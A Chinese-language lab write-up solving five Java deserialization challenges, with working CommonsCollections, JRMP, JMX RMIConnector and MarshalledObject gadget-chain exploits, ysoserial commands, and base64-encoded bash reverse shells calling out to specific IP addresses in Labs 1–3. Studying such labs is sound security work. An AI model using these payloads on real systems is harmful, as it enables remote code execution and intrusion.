JavaDeserializeLabs

Lab1

在java中对于bash命令的执行会把它按照空格分成三部分,也就是反弹shell命令中只能存在两个空格

序列化脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
package yxxx.javasec.deserialize;

import com.yxxx.javasec.deserialize.Calc;
import com.yxxx.javasec.deserialize.Utils;

import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;

public class Test {
public static void main(String[] args) throws Exception {
Calc calc = new Calc();
Class c = calc.getClass();
Field field = c.getDeclaredField("canPopCalc");
field.setAccessible(true);
field.set(calc,true);
Field field1 = c.getDeclaredField("cmd");
field1.setAccessible(true);
field1.set(calc,"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMTMuMTAyLjQ2Lzc3NzcgMD4mMQ0K}|{base64,-d}|{bash,-i}");
ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
objectOutputStream.writeObject(calc);
System.out.println(Utils.bytesTohexString(byteArrayOutputStream.toByteArray()));
}
}

Lab2

该题题目没有提供任何的类供我们来解决问题,但是我们看提供的库里面有CommonsCollections依赖,这样的话我们就可以利用cc链实现反序列化,达到rce的目的

image-20241115191034055

由于像cc1等链会受到jdk版本的限制,所以我们这边使用不会受版本限制的一条链,也就是cc6,所以我们的payload如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
package org.example.lab2.demos.web;

import com.yxxx.javasec.deserialize.Utils;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.HashMap;
import java.util.Map;

public class Sherlock {
public static void main(String[] args) throws Exception {
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMTMuMTAyLjQ2Lzc3NzcgMD4mMQ0K}|{base64,-d}|{bash,-i}"})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
HashMap<Object, Object> map = new HashMap<>();
Map<Object, Object> lazyMap = LazyMap.decorate(map, new ConstantTransformer(1));
TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, "aaa");
HashMap<Object, Object> map2 = new HashMap<>();
map2.put(tiedMapEntry, "bbb");
lazyMap.remove("aaa");

Class c = LazyMap.class;
Field factoryField = c.getDeclaredField("factory");
factoryField.setAccessible(true);
factoryField.set(lazyMap, chainedTransformer);
ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
objectOutputStream.writeUTF("SJTU");
objectOutputStream.writeInt(1896);
objectOutputStream.writeObject(map2);
System.out.println(Utils.bytesTohexString(byteArrayOutputStream.toByteArray()));
// ObjectInputStream objectInputStream = new ObjectInputStream(new ByteArrayInputStream(byteArrayOutputStream.toByteArray()));
// String name = objectInputStream.readUTF();
// int year = objectInputStream.readInt();
// if (name.equals("SJTU") && year == 1896) {
// objectInputStream.readObject();
// }
}

Lab3

首先观察到题目提供的库里面还是有CommonsCollections依赖,所以我们把第二题的payload先直接cv一遍,但是要注意的是在进行本地测试的时候反序列化的代码要更改为与题目符合的

这是因为在文件IndexController.class中调用的是自己写的MyObjectInputStream类

类的内容如下,重写了一个resolveClass()方法以及构造函数,构造函数中获取类Transformer类的类加载器,向上转型为URLClassLoader,获取URL数组对象,赋值给classLoader

重写的resolveClass()方法中,调用的是这个新的classLoader来进行类加载

1
2
3
4
5
6
7
8
9
10
11
12
13
14
public class MyObjectInputStream extends ObjectInputStream {
private ClassLoader classLoader;

public MyObjectInputStream(InputStream inputStream) throws Exception {
super(inputStream);
URL[] urls = ((URLClassLoader)Transformer.class.getClassLoader()).getURLs();
this.classLoader = new URLClassLoader(urls);
}

protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
Class clazz = this.classLoader.loadClass(desc.getName());
return clazz;
}
}

更改完测试的时候会直接报错如下:

image-20241225195036465

这里的[L开头指的是一个数组,即Transformer数组类去进行类加载失效

点击下面一行的报错,跳转至URLClassLoader.class文件中可以发现抛出该异常的原因是result==null

往上看result值的获取为下面这段代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
result = AccessController.doPrivileged(
new PrivilegedExceptionAction<Class<?>>() {
public Class<?> run() throws ClassNotFoundException {
String path = name.replace('.', '/').concat(".class");
Resource res = ucp.getResource(path, false);
if (res != null) {
try {
return defineClass(name, res);
} catch (IOException e) {
throw new ClassNotFoundException(name, e);
}
} else {
return null;
}
}
}, acc);

参数path是将name中的所有.都替换为反斜杠,然后最后接上.class

然后得到的path用于getResource()获取资源,成功的话就调用defineClass()进行类加载从而得到result

我们在这边打上断点看一下,这一步我是一直点绿色的恢复程序才调试到的

发现name的值是奇奇怪怪的一个数组类

image-20241226143600828

继续调试发现抛出异常的原因就是因为是数组类

image-20241226144119419

尝试过后发现只要是数组那么都会抛出异常

image-20241226144347000

我们查看一下ObjectInputStream类中的原生resolveClass()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
protected Class<?> resolveClass(ObjectStreamClass desc)
throws IOException, ClassNotFoundException
{
String name = desc.getName();
try {
return Class.forName(name, false, latestUserDefinedLoader());
} catch (ClassNotFoundException ex) {
Class<?> cl = primClasses.get(name);
if (cl != null) {
return cl;
} else {
throw ex;
}
}
}

可以发现调用的类加载方法是forName,而在自定义的MyObjectInputStream.class中调用的类加载方法是loadClass

怀疑loadClass方法不支持加载数组类,所以自己重写了个MyObjectInputStream1,通过判断是不是数组对象的类加载

如果是的话,应以[L开头,这时候我们调用forName()即可,成功触发命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
public class MyObjectInputStream1 extends ObjectInputStream {
private ClassLoader classLoader;

public MyObjectInputStream1(InputStream in) throws Exception {
super(in);
URL[] urls = ((URLClassLoader) ClassLoader.getSystemClassLoader()).getURLs();
this.classLoader = ClassLoader.getSystemClassLoader();
}

protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {

if (desc.getName().startsWith("[L")){
return Class.forName(desc.getName());
}
return this.classLoader.loadClass(desc.getName());
// return Class.forName(desc.getName());
}
}

成功证明loadClass方法不支持数组类加载,gpt骗我

所以我们的payload中不能够有数组,想起了刚刚学完的shiro反序列化中没有用到数组类,但很可惜没有CB依赖

到yso中去看看有没有用不到数组类,又是jdk自身的链子的

正好就在payloads/JRMPLinstener文件中,其gadget如下

1
2
3
4
5
6
7
8
9
10
Gadget chain:
UnicastRemoteObject.readObject(ObjectInputStream) line: 235
UnicastRemoteObject.reexport() line: 266
UnicastRemoteObject.exportObject(Remote, int) line: 320
UnicastRemoteObject.exportObject(Remote, UnicastServerRef) line: 383
UnicastServerRef.exportObject(Remote, Object, boolean) line: 208
LiveRef.exportObject(Target) line: 147
TCPEndpoint.exportObject(Target) line: 411
TCPTransport.exportObject(Target) line: 249
TCPTransport.listen() line: 319

再看看题目jdk版本为8u222,正好可以直接利用该链

开启JRMP Listener

1
java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 "bash -c {echo, YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTcuMjguMTA5LzkzMjAgMD4mMQ==}|{base64, -d}|{bash, -i}"

payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
package org.example;

import com.yxxx.javasec.deserialize.MyObjectInputStream;
import com.yxxx.javasec.deserialize.Utils;
import sun.rmi.server.UnicastRef;
import sun.rmi.transport.LiveRef;
import sun.rmi.transport.tcp.TCPEndpoint;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Proxy;
import java.rmi.AlreadyBoundException;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.ObjID;
import java.rmi.server.RemoteObjectInvocationHandler;
import java.util.Random;


public class Main {
public static void main(String[] args) throws Exception {

Registry reg = LocateRegistry.getRegistry("192.168.0.103",1099);
ObjID id = new ObjID(new Random().nextInt()); // RMI registry
TCPEndpoint te = new TCPEndpoint("192.168.0.103", 1099);
UnicastRef ref = new UnicastRef(new LiveRef(id, te, false));
RemoteObjectInvocationHandler obj = new RemoteObjectInvocationHandler(ref);
Registry proxy = (Registry) Proxy.newProxyInstance(Main.class.getClassLoader(), new Class[] {
Registry.class
}, obj);
ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
objectOutputStream.writeUTF("SJTU");
objectOutputStream.writeInt(1896);
objectOutputStream.writeObject(proxy);
System.out.println(Utils.bytesTohexString(byteArrayOutputStream.toByteArray()));

ByteArrayInputStream inputStream = new ByteArrayInputStream(byteArrayOutputStream.toByteArray());
ObjectInputStream objectInputStream = new MyObjectInputStream(inputStream);
objectInputStream.readUTF();
objectInputStream.readInt();
objectInputStream.readObject();
System.out.println(Utils.bytesTohexString(byteArrayOutputStream.toByteArray()));
}
}

Lab4

先查看一手依赖库,发现有jackson的相关库,并且版本高于2.10,直接上通杀poc

结果很遗憾,题目没有javassist库,该另寻他路了

image-20250315195008312

java层面的代码和lab3是一模一样的,但是多了一层nginx配置阻止出网

在RMIConnector下的fimdRMIServerJRMP()方法下,有一处反序列化

image-20250316154212538

从函数内容可知是将传入的参数base64进行base64解码之后再将其进行反序列化

查找该函数的用法,还是位于同文件下的findRMIServer方法中,只要传入的路径满足/stub/开头就行

image-20250316154418811

查找findRMIServer的用法,位于同文件下的connect方法中

image-20250316170958326

要怎么调用到connect方法呢,根据前面学习到的cc链可知能通过invokerTransformer类来触发,但是该题是不允许数组类的存在,所以不能用chainTransformer类,那么我们可以利用CC6中的TiedMapEntry的方式来触发invokerTransformer,并以HashMap当作入口类

connect方法中的jmxServiceURL参数是在该类的构造函数中获取的

image-20250316171211034

根据该构造函数简单写个函数

1
2
3
4
5
6
public static Object getBind() throws Exception {
JMXServiceURL jmxServiceURL = new JMXServiceURL("http://www.baidu.com");
RMIConnector connector = new RMIConnector(jmxServiceURL, new HashMap<>());
connector.connect();
System.out.println(jmxServiceURL.getURLPath());
return null;

报错

image-20250316173358212

查了一下发现url前面必须加上service:jmx:,修改一手

继续报错如下

image-20250316173652275

调试一手,发现协议需要改一下,不能够是http协议

image-20250316174635062

继续修改:

1
2
3
4
5
6
7
public static Object getBind() throws Exception {
JMXServiceURL jmxServiceURL = new JMXServiceURL("service:jmx:rmi://www.baidu.com");
RMIConnector connector = new RMIConnector(jmxServiceURL, new HashMap<>());
connector.connect();
System.out.println(jmxServiceURL.getURLPath());
return null;
}

继续报错

image-20250316192806120

这报错很明显,直接修改:

1
2
3
4
5
6
7
public static Object getBind() throws Exception {
JMXServiceURL jmxServiceURL = new JMXServiceURL("service:jmx:rmi://www.baidu.com/stub/12138");
RMIConnector connector = new RMIConnector(jmxServiceURL, new HashMap<>());
connector.connect();
System.out.println(jmxServiceURL.getURLPath());
return null;
}

image-20250316192948798

虽然报错但我们已经走到了base64解码的地方,也就是说我们只要在/stub/后面加上我们base64解码后的payload就可以了

所以接下来我们就加上TiedMapEntry:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
public static Object getBind() throws Exception {
JMXServiceURL jmxServiceURL = new JMXServiceURL("service:jmx:rmi://www.baidu.com/stub/12138");
RMIConnector connector = new RMIConnector(jmxServiceURL, new HashMap<>());
connector.connect();
System.out.println(jmxServiceURL.getURLPath());

InvokerTransformer invokerTransformer = new InvokerTransformer("connect",null,null);
HashMap<Object, Object> map = new HashMap<>();
Map<Object, Object> lazyMap = LazyMap.decorate(map, new ConstantTransformer(1));
TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, "connector");
HashMap<Object, Object> map2 = new HashMap<>();
map2.put(tiedMapEntry, "bbb");
lazyMap.remove("connector");

Class c = LazyMap.class;
Field factoryField = c.getDeclaredField("factory");
factoryField.setAccessible(true);
factoryField.set(lazyMap, invokerTransformer);

ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
ObjectOutputStream outputStream = new ObjectOutputStream(byteArrayOutputStream);
outputStream.writeObject(map2);

ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(byteArrayOutputStream.toByteArray());
ObjectInputStream objectInputStream = new ObjectInputStream(byteArrayInputStream);
objectInputStream.readObject();

return null;
}

跟上面同样的base64报错,我们已经知道原因,所以我们加上我们的base64的payload后就可以进行二次反序列化了

先利用yso工具生成一个payload

1
java -jar ysoserial-all.jar CommonsCollections5 "calc" > sherlock.txt

然后我们再次修改getBind()函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
public static Object getBind() throws Exception {
byte[] fileContent = Files.readAllBytes(Paths.get("E:\\safety\\ysoserial-master\\sherlock.txt"));
String payload = Base64.getEncoder().encodeToString(fileContent);

JMXServiceURL jmxServiceURL = new JMXServiceURL("service:jmx:rmi://www.baidu.com/stub/"+payload);
RMIConnector connector = new RMIConnector(jmxServiceURL, new HashMap<>());
//connector.connect();

InvokerTransformer invokerTransformer = new InvokerTransformer("connect",null,null);
HashMap<Object, Object> map = new HashMap<>();
LazyMap lazyMap = (LazyMap) LazyMap.decorate(map, new ConstantTransformer(1));
TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, connector);
HashMap<Object, Object> map2 = new HashMap<>();
map2.put(tiedMapEntry, "bbb");

Class<?> c = LazyMap.class;
Field factoryField = c.getDeclaredField("factory");
factoryField.setAccessible(true);
factoryField.set(lazyMap, invokerTransformer);
lazyMap.remove(connector);

ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
ObjectOutputStream outputStream = new ObjectOutputStream(byteArrayOutputStream);
outputStream.writeObject(map2);

ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(byteArrayOutputStream.toByteArray());
ObjectInputStream objectInputStream = new ObjectInputStream(byteArrayInputStream);
objectInputStream.readObject();

return null;
}

成功弹出计算器

重新生成paylaod

1
java -jar ysoserial-all.jar CommonsCollections5 "touch /tmp/666" > sherlock.txt

poc:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
package org.example;

import com.yxxx.javasec.deserialize.Utils;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.management.remote.JMXServiceURL;
import javax.management.remote.rmi.RMIConnector;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Base64;
import java.util.HashMap;

public class Test {
public static void main(String[] args) throws Exception {
ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
ObjectOutputStream outputStream = new ObjectOutputStream(byteArrayOutputStream);

outputStream.writeUTF("SJTU");
outputStream.writeInt(1896);
outputStream.writeObject(getBind());

ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(byteArrayOutputStream.toByteArray());
ObjectInputStream objectInputStream = new ObjectInputStream(byteArrayInputStream);
objectInputStream.readUTF();
objectInputStream.readInt();
objectInputStream.readObject();
System.out.println(Utils.bytesTohexString(byteArrayOutputStream.toByteArray()));

}

public static Object getBind() throws Exception {
byte[] fileContent = Files.readAllBytes(Paths.get("E:\\safety\\ysoserial-master\\sherlock.txt"));
String payload = Base64.getEncoder().encodeToString(fileContent);

JMXServiceURL jmxServiceURL = new JMXServiceURL("service:jmx:rmi://www.baidu.com/stub/"+payload);
RMIConnector connector = new RMIConnector(jmxServiceURL, new HashMap<>());
//connector.connect();

InvokerTransformer invokerTransformer = new InvokerTransformer("connect",null,null);
HashMap<Object, Object> map = new HashMap<>();
LazyMap lazyMap = (LazyMap) LazyMap.decorate(map, new ConstantTransformer(1));
TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, connector);
HashMap<Object, Object> map2 = new HashMap<>();
map2.put(tiedMapEntry, "bbb");

Class<?> c = LazyMap.class;
Field factoryField = c.getDeclaredField("factory");
factoryField.setAccessible(true);
factoryField.set(lazyMap, invokerTransformer);
lazyMap.remove(connector);
return map2;
}
}

虽然页面会报错但查看相关目录下面还是成功写进了文件666

image-20250316213141014

Lab5

一开始我们一样看代码,看看和lab4相比有什么变化

首先就是MyObjectInputStream类中的改变,增加了黑名单,并且在静态代码块中添加,所以会被最先运行

然后后面做了一个do-while循环检查反序列化的类名是否在黑名单中,在的话就会抛出异常”go out!”

黑名单定义如下:
image-20250318161633614

像是前面那些Transformer,都在functors下,所以之前的poc就不能用了

不仅如此,下面还又定义了一个方法resolveProxyClass,主要作用是根据接口名称数组加载对应的接口类,并创建或返回一个动态代理类

查找一下它的用法,发现会在ObjectInputStream下面被调用

image-20250318162021416

这道题需要跟进一下原生反序列化的过程,即readObject()的部分反序列化流程

先创建一个普通的类

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
package org.example;

import java.io.ObjectInputStream;
import java.io.Serializable;

public class UserTest implements Serializable {
public UserTest(){}
public int age;
public String name;
private float weight;
public UserTest(int age,String name,float weight){
this.name = name;
this.age = age;
this.weight = weight;
}
static {
System.out.println("static");
}
}

然后创建对象,用原生序列化,用原生反序列化

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
package org.example;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;

public class Main {
public static void main(String[] args) throws Exception{
UserTest userTest = new UserTest(21,"sherlock",65);
ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
ObjectOutputStream outputStream = new ObjectOutputStream(byteArrayOutputStream);

outputStream.writeUTF("SJTU");
outputStream.writeInt(1896);
outputStream.writeObject(userTest);

ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(byteArrayOutputStream.toByteArray());
ObjectInputStream objectInputStream = new ObjectInputStream(byteArrayInputStream);
objectInputStream.readUTF();
objectInputStream.readInt();
objectInputStream.readObject();
}
}

断点打在readObject()处,强制跟进去

image-20250318164733130

继续跟进readOject0()中

image-20250318164824614

gpt给出的解释是:

这段代码是Java反序列化过程中readObject0方法的一部分,它处理输入流中的不同类型的对象数据。下面是对代码的逐步分析:

  1. 跳过重置标记:

    1
    2
    3
    4
    5
    byte tc;
    while ((tc = bin.peekByte()) == TC_RESET) {
    bin.readByte();
    handleReset();
    }

    这部分代码通过循环跳过所有的 TC_RESET 标记,并调用 handleReset() 方法来处理重置操作。循环结束后,tc 变量保存了第一个非 TC_RESET 的字节

  2. 增加深度计数:

    1
    depth++;

    depth 是一个计数器,用于跟踪当前反序列化调用的深度。这在处理嵌套对象时很有用

  3. 根据类型处理不同的数据:

    1
    2
    3
    switch (tc) {
    // 各种类型的处理逻辑
    }

    通过 switch 语句,代码根据 tc 的值来确定接下来要处理的对象类型。不同的类型代码有不同的处理逻辑:

    • TC_NULL: 调用 readNull() 方法处理空引用。
    • TC_REFERENCE: 调用 readHandle(unshared) 方法处理对象引用。
    • TC_CLASS: 调用 readClass(unshared) 方法处理类对象。
    • TC_CLASSDESCTC_PROXYCLASSDESC: 调用 readClassDesc(unshared) 方法处理类描述符。
    • TC_STRINGTC_LONGSTRING: 调用 readString(unshared) 并通过 checkResolve 方法处理字符串。
    • TC_ARRAY: 调用 readArray(unshared) 并通过 checkResolve 方法处理数组。
    • TC_ENUM: 调用 readEnum(unshared) 并通过 checkResolve 方法处理枚举。
    • TC_OBJECT: 调用 readOrdinaryObject(unshared) 并通过 checkResolve 方法处理普通对象。
    • TC_EXCEPTION: 调用 readFatalException() 读取异常,并抛出 WriteAbortedException
    • TC_BLOCKDATATC_BLOCKDATALONG: 处理块数据模式,如果 oldModetrue,则设置块数据模式并抛出 OptionalDataException;否则抛出 StreamCorruptedException
    • TC_ENDBLOCKDATA: 如果 oldModetrue,抛出 OptionalDataException;否则抛出 StreamCorruptedException
  4. 默认情况:

    1
    2
    3
    default:
    throw new StreamCorruptedException(
    String.format("invalid type code: %02X", tc));

    如果 tc 的值不在预期的类型码范围内,则抛出 StreamCorruptedException,指示流中存在无效的类型码

这段代码通过类型码控制流的执行路径,确保根据序列化协议正确地反序列化不同类型的数据

言归正传,我们继续往下走,由于我们反序列化的userTest是一个普通的java对象,所以会走进TC_OBJECT

image-20250318165702536

跟进readOrdinaryObject()

当执行完下面这一行之后,我们反序列化过程所需要的各种对象的所有信息就已经存储于其中了

image-20250318165932999

我们跟进readClassDesc方法

tc继续读取下一个字节,TC_CLASSDESC表示接下来要反序列化的是一个Class

跟进readNonProxyDesc()

image-20250318170029843

这里尝试读取类标识符,跟进readClassDescriptor()

image-20250318170401529

跟进readNonProxy方法

image-20250318170508273

该方法主要就是对反序列化类的属性进行一个读取

image-20250318170720409

接着一路返回,回到readNonProxyDesc(),此时readDesc已经存放进我们反序列化的UserTest类的相关信息了

image-20250318171052094

接着我们继续往下走,来到这里的resolveClass()

题目中的MyObjectInputStream里面的resolveClass()就是在这个地方做了个黑名单过滤的,如果使用MyObjectInputStream来进行反序列化的话,此处会走入我们自定义的resolveClass中

image-20250318171429837

走进resolveClass函数,直接进行了forName函数的类加载

image-20250318214550606

返回后cl已经是UserTest的Class了

image-20250318214722681

接着一路返回到readOrdinaryObject(),desc已准备就绪

image-20250318214849793

通过forClass函数类加载赋值给cl

image-20250318215021880

接着实例化desc

image-20250318215154617

得到一个空空如也的UserTest对象

image-20250318215258271

往下走,顾名思义是要读取序列化数据,也就是要给obj这个对象的属性赋值

跟进看看

image-20250318215339136

来到这,这里有个hasReadObjectMethod的判断,顾名思义就是判断当前类中有没有重写readObject(),我们的TestUser是没有的,因此直接跳过走到defaultReadFields(obj, slotDesc);

image-20250318215553989

我们跟进该方法,往下走

image-20250318215802374

在这里对基础类型(int,fload,boolean等)进行了赋值

步过了之后我们查看可知obj的age和weight字段都已经进行了赋值

image-20250318215919080

继续往下走,跟进setObjFieldValues()

image-20250318220106428

从参数中我们就知道是对之前还没有赋值的字段进行一个赋值

步过之后,至此所有非traiseint字段都赋值了

一路步过回到readOrdinaryObject()方法

image-20250318220506970

紧接着下面就挨着hasReadResolveMethod的判断,如果为true的话,那么就会执行对应反序列化的类中的readResolve方法

readResolve方法很眼熟吧,认真看过题目提供的代码的话,就知道在MarshalledObject中,有定义readResolve()方法,所以如果对MarshalledObject进行反序列化,那么是会走到if里面的

看看MarshalledObject中的readResolve()

image-20250318221246803

芜湖,里面又是一个原生反序列化,是对MarshalledObject的参数bytes进行一个反序列化

并且MarshalledObject并没有在黑名单中,所以如果构造恶意的MarshalledObject.byte[],那么对这个MarshalledObject对象进行反序列化的时候就会直接再走一次不受黑名单限制的原生反序列化,通过二次反序列化再次达到攻击

思路已经有了,现在我们用yso工具给我们生成一个payload:

1
java -jar ysoserial-all.jar CommonsCollections5 "touch /tmp/666" > sherlock.txt

poc:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
package org.example;

import com.yxxx.javasec.deserialize.MarshalledObject;
import com.yxxx.javasec.deserialize.Utils;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;

public class Main {
public static void main(String[] args) throws Exception{
MarshalledObject marshalledObject = new MarshalledObject();
byte[] fileContent = Files.readAllBytes(Paths.get("E:\\safety\\ysoserial-master\\sherlock.txt"));
Class<?> marshalledClass = MarshalledObject.class;
Field field = marshalledClass.getDeclaredField("bytes");
field.setAccessible(true);
field.set(marshalledObject, fileContent);

ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
ObjectOutputStream outputStream = new ObjectOutputStream(byteArrayOutputStream);
outputStream.writeUTF("SJTU");
outputStream.writeInt(1896);
outputStream.writeObject(marshalledObject);
System.out.println(Utils.bytesTohexString(byteArrayOutputStream.toByteArray()));

ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(byteArrayOutputStream.toByteArray());
ObjectInputStream objectInputStream = new ObjectInputStream(byteArrayInputStream);
objectInputStream.readUTF();
objectInputStream.readInt();
objectInputStream.readObject();
}
}

将生成的hex编码拿去测试,成功写入

image-20250319212003973